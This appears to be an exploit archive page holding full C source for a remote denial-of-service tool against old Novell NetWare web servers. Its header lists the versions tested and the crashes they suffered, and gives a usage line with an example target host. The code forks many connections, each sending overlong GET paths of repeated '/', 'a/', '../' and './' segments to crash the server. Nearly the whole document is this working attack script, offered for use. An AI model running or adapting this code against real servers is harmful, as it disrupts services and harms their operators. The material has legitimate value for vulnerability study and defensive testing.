Novell NetWare webservers remote denial of service - Tested on Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1, Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1, Novell NetWare ?.? with YAWN/1.05.
82e29ba646ae0fed257d1d55f00ab7948089713cf990959663a0e8bc3f3537f7/******************************************************************************
Novell NetWare webservers remote denial of service
<venglin@freebsd.lublin.pl>
( buffer0verfl0w security - b0f.morphed.net )
*******************************************************************************
Tested on:
- Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
Webserver stops responding requests for few minutes.
- Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
Whole system crash [page fault?].
- Novell NetWare ?.? with YAWN/1.05 (crc:E8B0):
Webserver crash.
- Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0):
No problems.
- Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0):
No problems.
*******************************************************************************
Usage:
./www <vulnerable_host> <http_port> <how_many_connections> <string_length>
Example:
./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/wait.h>
#define GET "GET"
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"
long getip(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1)
{
if ((hp=gethostbyname(name))==NULL)
{
(void)fprintf(stderr, "gethostbyname failed.\n");
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int main (argc, argv)
int argc;
char **argv;
{
struct sockaddr_in cli;
int sockfd, i, x, len;
char *msg1, *msg2, *msg3, *msg4;
if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]); exit(0); }
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_addr.s_addr=getip(argv[1]);
cli.sin_port = htons(atoi(argv[2]));
len = atoi(argv[4]);
if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); }
msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
sprintf(msg1, "%s %s", GET, PAT1);
sprintf(msg2, "%s %s", GET, PAT1);
sprintf(msg3, "%s %s", GET, PAT1);
sprintf(msg4, "%s %s", GET, PAT1);
for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);
for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
{
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg1, strlen(msg1));
close(sockfd);
free(msg1);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg2, strlen(msg2));
close(sockfd);
free(msg2);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg3, strlen(msg3));
close(sockfd);
free(msg3);
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket");
exit(1);
}
if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
{
perror("connect");
exit(1);
}
write(sockfd, msg4, strlen(msg4));
close(sockfd);
free(msg4);
exit(0);
}
waitpid(x,&i,0);
exit(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed